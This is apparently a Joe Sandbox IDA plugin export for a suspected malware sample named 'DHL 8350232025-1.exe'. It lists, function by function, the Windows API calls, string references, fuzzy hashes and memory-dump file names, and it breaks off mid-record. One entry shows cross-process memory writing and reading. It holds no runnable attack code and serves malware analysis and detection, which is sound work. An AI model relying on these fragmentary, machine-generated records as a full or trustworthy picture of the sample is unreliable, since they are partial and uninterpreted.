Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 37f297163ebee8cec90230809ac3e2b06c215c6de1bced5a0c2b427133f7ccfb
Instruction ID: f6dee02ad45025786ac07dbc96fb49a13d02e21fad0503c4aee347a76f0b1ddc
Opcode Fuzzy Hash: 37f297163ebee8cec90230809ac3e2b06c215c6de1bced5a0c2b427133f7ccfb
Instruction Fuzzy Hash: 0F015B31C1162DDBCF009FE5E85D6DDBB78BB08301F110956E942B2192CB3095A087A2

Function 002010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00201114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 00201120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 0020112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 00201136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0020114D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: b62dd152896e35463ec1bc9e6d030ce39da524ad95be01fddc4ce3d829abe654
Instruction ID: b24ce3c6023877a0278d913de4fdbc8cde380e48188e545aabb51907c82e06b5
Opcode Fuzzy Hash: b62dd152896e35463ec1bc9e6d030ce39da524ad95be01fddc4ce3d829abe654
Instruction Fuzzy Hash: 89011975200315BFDB154FA5EC4DA6A7B6EEF893A0B204429FA49E73A0DA31DC109B60

Function 00200FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00200FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00200FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00200FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00200FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00201002

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 25681e8ea185f24c28253d5a6183d915c387617e8df92c5c3283f951bebfad49
Instruction ID: d3d6ffa4e5dec83a6b2c43578d41230f1c99740f189750678924c46ed0a2825b
Opcode Fuzzy Hash: 25681e8ea185f24c28253d5a6183d915c387617e8df92c5c3283f951bebfad49
Instruction Fuzzy Hash: B2F06235200311EBD7215FA4EC4DF563B6EEF89761F204414FD89D7291CA70DC608B60

Function 00201014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0020102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00201036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00201045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0020104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00201062

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 085630055e7df8f39ec7a87cb22a7eba0769445a3d0362fef93bcbc0497b3900
Instruction ID: bd2c12466e45fa45abd3aef0d30abf8d82a0a135539db5cc3a5da0b748038cf9
Opcode Fuzzy Hash: 085630055e7df8f39ec7a87cb22a7eba0769445a3d0362fef93bcbc0497b3900
Instruction Fuzzy Hash: 09F06D35200312EBDB215FA4EC4DF563BAEEF89761F200424FE89E7291CA70D8608B60

Function 0021030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0021017D,?,002132FC,?,00000001,001E2592,?), ref: 00210324
CloseHandle.KERNEL32(?,?,?,?,0021017D,?,002132FC,?,00000001,001E2592,?), ref: 00210331
CloseHandle.KERNEL32(?,?,?,?,0021017D,?,002132FC,?,00000001,001E2592,?), ref: 0021033E
CloseHandle.KERNEL32(?,?,?,?,0021017D,?,002132FC,?,00000001,001E2592,?), ref: 0021034B
CloseHandle.KERNEL32(?,?,?,?,0021017D,?,002132FC,?,00000001,001E2592,?), ref: 00210358
CloseHandle.KERNEL32(?,?,?,?,0021017D,?,002132FC,?,00000001,001E2592,?), ref: 00210365

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 42bb6236cfc8a32ab0303135b5ae1e61bda5ca2f3d208aced64eb064ed571f9f
Instruction ID: ebc2576f87960d96bbe6401a3a190a21a616d767f4eb78d1a7f0de1229ac023e
Opcode Fuzzy Hash: 42bb6236cfc8a32ab0303135b5ae1e61bda5ca2f3d208aced64eb064ed571f9f
Instruction Fuzzy Hash: C301A272810B169FC730AF66D8C0456F7F5BF603153158A7FD1A652931C3B1A9A5DF80

Function 001DD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001DD752

Part of subcall function 001D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000), ref: 001D29DE
Part of subcall function 001D29C8: GetLastError.KERNEL32(00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000,00000000), ref: 001D29F0

_free.LIBCMT ref: 001DD764
_free.LIBCMT ref: 001DD776
_free.LIBCMT ref: 001DD788
_free.LIBCMT ref: 001DD79A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9973e0b073f01a3d1d57781fbf986f91ae2c388cee4feeb9e859d1dfa34e0c62
Instruction ID: 710f23c6bd13da9e4a8eca1fb5dde9b8bb68627ba0a8653394babb5aac9e62e5
Opcode Fuzzy Hash: 9973e0b073f01a3d1d57781fbf986f91ae2c388cee4feeb9e859d1dfa34e0c62
Instruction Fuzzy Hash: C8F09632541214AB8725FB64F9C6C2677DDBB54318BA44C47F0A8D7701C734FC808A60

Function 00205C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00205C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00205C6F
MessageBeep.USER32(00000000), ref: 00205C87
KillTimer.USER32(?,0000040A), ref: 00205CA3
EndDialog.USER32(?,00000001), ref: 00205CBD

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ba4b90a4933b9d217b62c756fc3dee0833b448bf2590f6888577b3a0e27ce131
Instruction ID: f632a91a95dfc7740d0012a80edb264925bbfe36a55bfd0bd2a087fbb0909726
Opcode Fuzzy Hash: ba4b90a4933b9d217b62c756fc3dee0833b448bf2590f6888577b3a0e27ce131
Instruction Fuzzy Hash: 13016231510B14ABFB215B10ED4FFA67BBCBB00B05F04155AA583B14E1DBF4A9958F90

Function 001D22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001D22BE

Part of subcall function 001D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000), ref: 001D29DE
Part of subcall function 001D29C8: GetLastError.KERNEL32(00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000,00000000), ref: 001D29F0

_free.LIBCMT ref: 001D22D0
_free.LIBCMT ref: 001D22E3
_free.LIBCMT ref: 001D22F4
_free.LIBCMT ref: 001D2305

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c1f45f0a31e73241a24ed8ce56702eb5f6c5cafc8e90ec131fcb3754cbd695f
Instruction ID: 7b09dbae83218c4ea63318b889a9ce07ea251267223c2bf89315b765ee2204c8
Opcode Fuzzy Hash: 9c1f45f0a31e73241a24ed8ce56702eb5f6c5cafc8e90ec131fcb3754cbd695f
Instruction Fuzzy Hash: 46F03AB08101308B8626BF68BC598183B68BB38760710050BF828D33B2CB7008A1BBE5

Function 001B95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001B95D4
StrokeAndFillPath.GDI32(?,?,001F71F7,00000000,?,?,?), ref: 001B95F0
SelectObject.GDI32(?,00000000), ref: 001B9603
DeleteObject.GDI32 ref: 001B9616
StrokePath.GDI32(?), ref: 001B9631

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: a043b69e04511fa1f89761f3cbfea4810a0ce6cce7c281a4a025f7a50762dffe
Instruction ID: ee00e79f48537a9462d8ce7bea5602fee1dc73c0c22527ae732270adbe3ad025
Opcode Fuzzy Hash: a043b69e04511fa1f89761f3cbfea4810a0ce6cce7c281a4a025f7a50762dffe
Instruction Fuzzy Hash: 7AF0E731006288EBDB265F69FD1CBA43F65AF01322F148214F669690F0C73189A7DF20

Function 001D0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 001D10F9
__freea.LIBCMT ref: 001D1117

Part of subcall function 001D1537: _free.LIBCMT ref: 001D154F

Strings

am/pm, xrefs: 001D117A
a/p, xrefs: 001D11DE

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 72b631817deb138def9e9f6df038a26a1a9651d93d57c2c11ff38600b05e6930
Instruction ID: bb47504cd57436ccc7293871a1514480bf5d840cb0aa8dc69ac2be9db3b36cce
Opcode Fuzzy Hash: 72b631817deb138def9e9f6df038a26a1a9651d93d57c2c11ff38600b05e6930
Instruction Fuzzy Hash: 53D10331900206FADB289F68C895BFEB7B1FF16320F29415BE901AB751D3759D80CB91

Function 002261D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 001C0242: EnterCriticalSection.KERNEL32(0027070C,00271884,?,?,001B198B,00272518,?,?,?,001A12F9,00000000), ref: 001C024D
Part of subcall function 001C0242: LeaveCriticalSection.KERNEL32(0027070C,?,001B198B,00272518,?,?,?,001A12F9,00000000), ref: 001C028A

Part of subcall function 001C00A3: __onexit.LIBCMT ref: 001C00A9

__Init_thread_footer.LIBCMT ref: 00226238

Part of subcall function 001C01F8: EnterCriticalSection.KERNEL32(0027070C,?,?,001B8747,00272514), ref: 001C0202
Part of subcall function 001C01F8: LeaveCriticalSection.KERNEL32(0027070C,?,001B8747,00272514), ref: 001C0235

Part of subcall function 0021359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002135E4
Part of subcall function 0021359C: LoadStringW.USER32(00272390,?,00000FFF,?), ref: 0021360A

Strings

x#', xrefs: 00226353
x#', xrefs: 0022636F
x#', xrefs: 0022633A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#'$x#'$x#'
API String ID: 1072379062-1408229380
Opcode ID: 2b8e3eae46ad48ede572cf1335b0556c90d3f9ee72e4cc1a0ab4b5110dc9ea9f
Instruction ID: 37defcdb6f2b3eed2d542c3d26f07fd609b7f0ae49c34a90104b25a466c8fc26
Opcode Fuzzy Hash: 2b8e3eae46ad48ede572cf1335b0556c90d3f9ee72e4cc1a0ab4b5110dc9ea9f
Instruction Fuzzy Hash: B0C1BD72A10116AFCB24DF98D894EBEB7B9EF58300F108069F9459B291DB70ED64CB90

Function 00227B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 001C0242: EnterCriticalSection.KERNEL32(0027070C,00271884,?,?,001B198B,00272518,?,?,?,001A12F9,00000000), ref: 001C024D
Part of subcall function 001C0242: LeaveCriticalSection.KERNEL32(0027070C,?,001B198B,00272518,?,?,?,001A12F9,00000000), ref: 001C028A

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 001C00A3: __onexit.LIBCMT ref: 001C00A9

__Init_thread_footer.LIBCMT ref: 00227BFB

Part of subcall function 001C01F8: EnterCriticalSection.KERNEL32(0027070C,?,?,001B8747,00272514), ref: 001C0202
Part of subcall function 001C01F8: LeaveCriticalSection.KERNEL32(0027070C,?,001B8747,00272514), ref: 001C0235

Strings

Variable must be of type 'Object'., xrefs: 00227C3A
G, xrefs: 00227C7F
5, xrefs: 00227C78

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: acf5fe8b6dfe587c2484dea36797e56d793128db601d550c8fb45911ed88fbd9
Instruction ID: 3df461791bb7fece8c859f4060fa531ee47eb21ee15d4985fcfd3798fe9fcf10
Opcode Fuzzy Hash: acf5fe8b6dfe587c2484dea36797e56d793128db601d550c8fb45911ed88fbd9
Instruction Fuzzy Hash: AF91A074628219EFCB14EF94E891DBDB7B1FF49300F508059F8066B292DB71AE61CB51

Function 00202716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0020B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002021D0,?,?,00000034,00000800,?,00000034), ref: 0020B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00202760

Part of subcall function 0020B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0020B3F8

Part of subcall function 0020B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0020B355
Part of subcall function 0020B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00202194,00000034,?,?,00001004,00000000,00000000), ref: 0020B365
Part of subcall function 0020B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00202194,00000034,?,?,00001004,00000000,00000000), ref: 0020B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002027CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0020281A

Strings

@, xrefs: 00202832

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 7637ae7631afa3a947469d8f00a0b813204ffbde91b57e41e9ed4433c13de18e
Instruction ID: 6f8a86957e02fcc8dbff2c0e5c08dacff05c961a078e79038875eac145242aab
Opcode Fuzzy Hash: 7637ae7631afa3a947469d8f00a0b813204ffbde91b57e41e9ed4433c13de18e
Instruction Fuzzy Hash: 41413C76900218AFDB11DFA4CD46AEEBBB8AF09300F108095FA55B7191DB706E59CFA0

Function 001D172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL 8350232025-1.exe,00000104), ref: 001D1769
_free.LIBCMT ref: 001D1834
_free.LIBCMT ref: 001D183E

Strings

C:\Users\user\Desktop\DHL 8350232025-1.exe, xrefs: 001D1760, 001D1767, 001D1796, 001D17CE

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DHL 8350232025-1.exe
API String ID: 2506810119-708328646
Opcode ID: 051281f51a06f215a540411fd86acdcbea80795da60a7420d5a2339dd0ae9851
Instruction ID: 08942029d0fa2b9cc8a9bdff37051a776458a7ab11b99cc757c2b370e8b1366c
Opcode Fuzzy Hash: 051281f51a06f215a540411fd86acdcbea80795da60a7420d5a2339dd0ae9851
Instruction Fuzzy Hash: 0C318D71A40258BBDB21DB99D885D9EBBFCEFA5310B1041ABF804D7321D7708E80DBA0

Function 0020C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0020C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0020C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00271990,010F5868), ref: 0020C395

Strings

0, xrefs: 0020C2DF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 5ad55728a38764e67169c0d5e2ba1021ab040a9425ea73cd481db62217446dce
Instruction ID: 66157674c898812fd9a2d8225b1cffa6740c8d6c0b88ff4c2216b2c2a4d452ed
Opcode Fuzzy Hash: 5ad55728a38764e67169c0d5e2ba1021ab040a9425ea73cd481db62217446dce
Instruction Fuzzy Hash: EE41B2B12243029FD720DF24D884B5ABBE4AF85310F20876DF8A5972D2D770E954CB62

Function 00234416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0023CC08,00000000,?,?,?,?), ref: 002344AA
GetWindowLongW.USER32 ref: 002344C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002344D7

Strings

SysTreeView32, xrefs: 0023447C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 3dff4296c54616e74b87f008258d86a98ddb379dc43ae00491a18d1e3e08111f
Instruction ID: d40fe634c098aaa47d184cdecce3d7d2227a30d564a52447b4f83edd5f0d4819
Opcode Fuzzy Hash: 3dff4296c54616e74b87f008258d86a98ddb379dc43ae00491a18d1e3e08111f
Instruction Fuzzy Hash: E4319072220206AFDB20AE38DC45BDA77A9EF19334F204725FA75A21D0D770EC619B50

Function 00206E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00206EED
VariantCopyInd.OLEAUT32(?,?), ref: 00206F08
VariantClear.OLEAUT32(?), ref: 00206F12

Strings

*j , xrefs: 00206E8B, 00206E90, 00206EF8

Memory Dump Source

